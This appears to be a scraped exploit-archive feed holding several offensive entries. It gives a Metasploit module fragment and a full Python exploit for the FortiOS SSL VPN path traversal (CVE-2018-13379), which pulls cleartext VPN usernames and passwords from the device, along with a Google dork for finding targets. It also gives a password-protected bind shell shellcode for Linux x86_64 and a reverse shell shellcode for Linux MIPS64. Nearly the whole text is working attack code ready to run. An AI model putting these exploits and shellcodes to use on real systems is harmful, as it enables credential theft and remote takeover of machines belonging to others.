FortiOS system file leak through SSL VPN via specially crafted HTTP resource requests.
This exploit read /dev/cmdb/sslvpn_websession file, this file contains login and passwords in (clear/text).
This vulnerability affect ( FortiOS 5.6.3 to 5.6.7 and FortiOS 6.0.0 to 6.0.4 ).
},
'References' =>
[
[ 'URL', 'http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13379' ]
],
'Author' => [ 'lynx (Carlos Vieira)' ],
'License' => MSF_LICENSE,
'DefaultOptions' =>
{
'RPORT' => 443,
'SSL' => true
},
))
end
def run()
print_good("Checking target...")
res = send_request_raw({'uri'=>'/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession'})
if res && res.code == 200
print_good("Target is Vulnerable!")
data = res.body
current_host = datastore['RHOST']
filename = "msf_sslwebsession_"+current_host+".bin"
File.delete(filename) if File.exist?(filename)
file_local_write(filename, data)
print_good("Parsing binary file.......")
parse()
else
if(res && res.code == 404)
print_error("Target not Vulnerable")
else
print_error("Ow crap, try again...")
end
end
end
def parse()
current_host = datastore['RHOST']
fileObj = File.new("msf_sslwebsession_"+current_host+".bin", "r")
words = 0
while (line = fileObj.gets)
printable_data = line.gsub(/[^[:print:]]/, '.')
array_data = printable_data.scan(/.{1,60}/m)
for ar in array_data
if ar != "............................................................"
print_good(ar)
end
end
#print_good(printable_data)
end
fileObj.close
end
end
↧
↧
FortiOS 5.6.7 / 6.0.4 Credential Disclosure
FortiOS versions 5.6.3 through 5.6.7 and 6.0.0 through 6.0.4 suffer from a credential disclosure vulnerability.
a022f0e2fde0c635d9836c8aef10e213# Exploit Title: FortiOS Leak file - Reading login/passwords in clear text.
# Google Dork: intext:"Please Login" inurl:"/remote/login"
# Date: 17/08/2019
# Exploit Author: Carlos E. Vieira
# Vendor Homepage: https://www.fortinet.com/
# Software Link: https://www.fortinet.com/products/fortigate/fortios.html
# Version: This vulnerability affect ( FortiOS 5.6.3 to 5.6.7 and FortiOS 6.0.0 to 6.0.4 ).
# Tested on: 5.6.6
# CVE : CVE-2018-13379
# Exploit SSLVPN Fortinet - FortiOs
#!/usr/bin/env python
import requests, sys, time
import urllib3
urllib3.disable_warnings()
def leak(host, port):
print("[!] Leak information...")
try:
url = "https://"+host+":"+port+"/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession"
headers = {"User-Agent": "Mozilla/5.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Upgrade-Insecure-Requests": "1"}
r=requests.get(url, headers=headers, verify=False, stream=True)
img=r.raw.read()
if "var fgt_lang =" in str(img):
with open("sslvpn_websession_"+host+".dat", 'w') as f:
f.write(img)
print("[>] Save to file ....")
parse(host)
print("\n")
return True
else:
return False
except requests.exceptions.ConnectionError:
return False
def is_character_printable(s):
return all((ord(c) < 127) and (ord(c) >= 32) for c in s)
def is_printable(byte):
if is_character_printable(byte):
return byte
else:
return '.'
def read_bytes(host, chunksize=8192):
print("[>] Read bytes from > " + "sslvpn_websession"+host+".dat")
with open("sslvpn_websession_"+host+".dat", "rb") as f:
while True:
chunk = f.read(chunksize)
if chunk:
for b in chunk:
yield b
else:
break
def parse(host):
print("[!] Parsing Information...")
memory_address = 0
ascii_string = ""
for byte in read_bytes(host):
ascii_string = ascii_string + is_printable(byte)
if memory_address%61 == 60:
if ascii_string!=".............................................................":
print ascii_string
ascii_string = ""
memory_address = memory_address + 1
def check(host, port):
print("[!] Check vuln...")
uri = "/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession"
try:
r = requests.get("https://" + host + ":" + port + uri, verify=False)
if(r.status_code == 200):
return True
elif(r.status_code == 404):
return False
else:
return False
except:
return False
def main(host, port):
print("[+] Start exploiting....")
vuln = check(host, port)
if(vuln):
print("[+] Target is vulnerable!")
bin_file = leak(host, port)
else:
print("[X] Target not vulnerable.")
if __name__ == "__main__":
if(len(sys.argv) < 3):
print("Use: python {} ip/dns port".format(sys.argv[0]))
else:
host = sys.argv[1]
port = sys.argv[2]
main(host, port)
↧
Linux/x86_64 TCP/4444 Bindshell With Password Shellcode
129 bytes small Linux/x86_64 bind (4444/TCP) shell (/bin/sh) + password (pass) shellcode.
4f69a9a7b34a1231bc105cb3374d328e/*
; Title : Linux/x86_64 - Bind Shell (/bin/sh) with Password (configurable) (129 bytes)
; Date : 2019-08-18
; Author : Gonçalo Ribeiro (@goncalor)
; Website : goncalor.com
; SLAE64-ID : 1635
global _start
%define pass "pass"
%define port 0x5c11 ; htons(4444)
_start:
jmp real_start
password: db pass
pass_len: db $-password
real_start:
socket:
; sock = socket(AF_INET, SOCK_STREAM, 0)
; AF_INET = 2
; SOCK_STREAM = 1
; __NR_socket = 41
; On success, a file descriptor for the new socket is returned
push 41
pop rax
push 2
pop rdi
push 1
pop rsi
cdq ; copies rax's bit 31 to all bits of edx (zeroes rdx)
syscall
push rax
pop rdi
bind:
; server.sin_family = AF_INET; short
; server.sin_port = htons(4444); unsigned short
; server.sin_addr.s_addr = INADDR_ANY; unsigned long
; bzero(&server.sin_zero, 8);
;
; https://beej.us/guide/bgnet/html/multi/sockaddr_inman.html
; struct sockaddr_in {
; short sin_family;
; unsigned short sin_port;
; struct in_addr sin_addr;
; char sin_zero[8];
; };
;
; bind(sock, (struct sockaddr *)&server, sockaddr_len)
; INADDR_ANY = 0
; AF_INET = 2
; __NR_bind = 49
; On success, zero is returned
xor eax, eax ; shorter and will still zero the upper bytes
push rax ; sin_zero
push ax
push ax ; sin_addr
push word port
push word 2
; bind
add al, 49
push rsp
pop rsi
add dl, 16 ; sizeof(sockaddr_in)
syscall
listen:
; listen(sock, 2)
; __NR_listen = 50
; On success, zero is returned
mov al, 50
xor esi, esi
mov sil, 2
syscall
accept:
; new = accept(sock, (struct sockaddr *)&client, &sockaddr_len)
; __NR_accept = 43
; On success, a file descriptor is returned
mov al, 43
xor esi, esi
;xor rdx, rdx ; already zeroed
syscall
push rax
;close:
; close(sock)
; __NR_close = 3
; returns zero on success
; closing is not strictly necessary
;mov al, 3
;syscall
dup2:
; dup2(new, 0);
; dup2(new, 1);
; dup2(new, 2);
; __NR_dup2 = 33
; On success, return the new file descriptor
pop rdi ; "new" was pushed in accept()
push 2
pop rsi
dup2_loop:
mov al, 33
syscall
dec esi
jns dup2_loop
read_password:
; read(int fd, void *buf, size_t count)
; On success, the number of bytes read is returned
;xor eax, eax ; already done by dup2
;rdi = "new" ; already done in dup2
push rax
push rax ; create space for "buf" in the stack
push rsp
pop rsi ; rsi = *buf
mov dl, 16
syscall
compare_password:
xor ecx, ecx
lea rdi, [rel pass_len]
mov cl, [rdi]
sub rdi, rcx
cld
repz cmpsb
jne exit
execve:
; execve(const char *path, char *const argv[], char *const envp[])
; rdi, path = (char*) /bin//sh, 0x00 (double slash for padding)
; rsi, argv = (char**) (/bin//sh, 0x00)
; rdx, envp = &0x00
xor eax, eax
push rax
push rsp
pop rdx ; *rdx = &0x00
mov rsi, 0x68732f2f6e69622f ; rax2 -S $(echo /bin//sh | rev)
push rsi
push rsp
pop rdi ; rdi = (char*) /bin//sh
push rax
push rdi
push rsp
pop rsi ; rsi = (char**) (/bin//sh, 0x00)
mov al, 59
syscall
exit:
;xor eax, eax ; upper bytes are zero after read
mov al, 60
syscall
*/
#include <stdio.h>
#include <string.h>
char code[] =
"\xeb\x05\x70\x61\x73\x73\x04\x6a\x29\x58\x6a\x02\x5f\x6a\x01\x5e\x99\x0f"
"\x05\x50\x5f\x31\xc0\x50\x66\x50\x66\x50\x66\x68\x11\x5c\x66\x6a\x02\x04"
"\x31\x54\x5e\x80\xc2\x10\x0f\x05\xb0\x32\x31\xf6\x40\xb6\x02\x0f\x05\xb0"
"\x2b\x31\xf6\x0f\x05\x50\x5f\x6a\x02\x5e\xb0\x21\x0f\x05\xff\xce\x79\xf8"
"\x50\x50\x54\x5e\xb2\x10\x0f\x05\x31\xc9\x48\x8d\x3d\xad\xff\xff\xff\x8a"
"\x0f\x48\x29\xcf\xfc\xf3\xa6\x75\x1a\x31\xc0\x50\x54\x5a\x48\xbe\x2f\x62"
"\x69\x6e\x2f\x2f\x73\x68\x56\x54\x5f\x50\x57\x54\x5e\xb0\x3b\x0f\x05\xb0"
"\x3c\x0f\x05";
int main() {
printf("length: %lu\n", strlen(code));
((int(*)()) code)();
}
↧
Linux/MIPS64 Reverse Shell Shellcode
157 bytes small Linux/MIPS64 reverse (localhost:4444/TCP) shell shellcode.
943dc4bcee3d0b33275bf2fdf8a0cb86/*
* # Reverse shell shellcode for Linux MIPS64 (mips64el)
* # Default port: tcp/4444
* # Host: localhost
* # Date: August 19 - 2019
* # Author: Antonio de la Piedra
* # Tested on: MIPS Malta - Linux debian-mips64el 4.9.0-3-5kc-malta
* # Size: 157 bytes
* # Compile with: gcc -fno-stack-protector -z execstack main.c -o main -g
*/
#include <stdio.h>
#include <string.h>
/*
.text
.global __start
__start:
dli $s4, -3
dli $s5, -17
nor $a0,$s4,$zero
nor $a1,$s4,$zero
slti $a2,$zero,-1
li $v0,5040
syscall 0x40404
sw $v0, -32($sp)
lw $a0, -32($sp)
nor $t0,$s4,$zero
sw $t0, -12($sp)
dli $t2,0x5c11
sw $t2,-10($sp)
dli $t1,0x0101017f
sw $t1,-8($sp)
daddiu $a1,$sp,-12
nor $a2,$s5,$zero
dli $v0,5041
syscall 0x40404
nor $a1,$s4,$zero
dli $s0, -1
loop:
dli $v0,5032
syscall 0x40404
daddi $a1,$a1,-1
bne $a1,$s0,loop
dli $t0,0x69622f2f
sw $t0,-12($sp)
dli $t1,0x68732f6e
dli $t1,0x68732f6e
sw $t1,-8($sp)
sw $zero,-4($sp)
daddiu $a0,$sp,-12
slti $a1,$zero,-1
slti $a2,$zero,-1
dli $v0,5057
syscall 0x40404
.align 8
*/
unsigned char code[] =
"\xfd\xff\x14\x24"
"\xfd\xff\x14\x24"
"\xef\xff\x15\x24"
"\x27\x20\x80\x02"
"\x27\x28\x80\x02"
"\xff\xff\x06\x28"
"\xb0\x13\x02\x24"
"\x0c\x01\x01\x01"
"\xe0\xff\xa2\xaf"
"\xe0\xff\xa4\x8f"
"\x27\x60\x80\x02"
"\xf4\xff\xac\xaf"
"\x11\x5c\x0e\x24"
"\xf6\xff\xae\xaf"
"\x01\x01\x0d\x3c"
"\x7f\x01\xad\x35"
"\xf8\xff\xad\xaf"
"\xf4\xff\xa5\x67"
"\x27\x30\xa0\x02"
"\xb1\x13\x02\x24"
"\x0c\x01\x01\x01"
"\x27\x28\x80\x02"
"\xff\xff\x10\x24"
"\xa8\x13\x02\x24"
"\x0c\x01\x01\x01"
"\xff\xff\xa5\x60"
"\xfc\xff\xb0\x14"
"\x62\x69\x0c\x3c"
"\x2f\x2f\x8c\x35"
"\xf4\xff\xac\xaf"
"\x73\x68\x0d\x3c"
"\x6e\x2f\xad\x35"
"\xf8\xff\xad\xaf"
"\xfc\xff\xa0\xaf"
"\xf4\xff\xa4\x67"
"\xff\xff\x05\x28"
"\xff\xff\x06\x28"
"\xc1\x13\x02\x24"
"\x0c\x01\x01\x01";
int main(int argc, char ** argv)
{
void(*s)(void);
printf("Shellcode Length: %d\n", strlen(code));
s = code;
s();
}
↧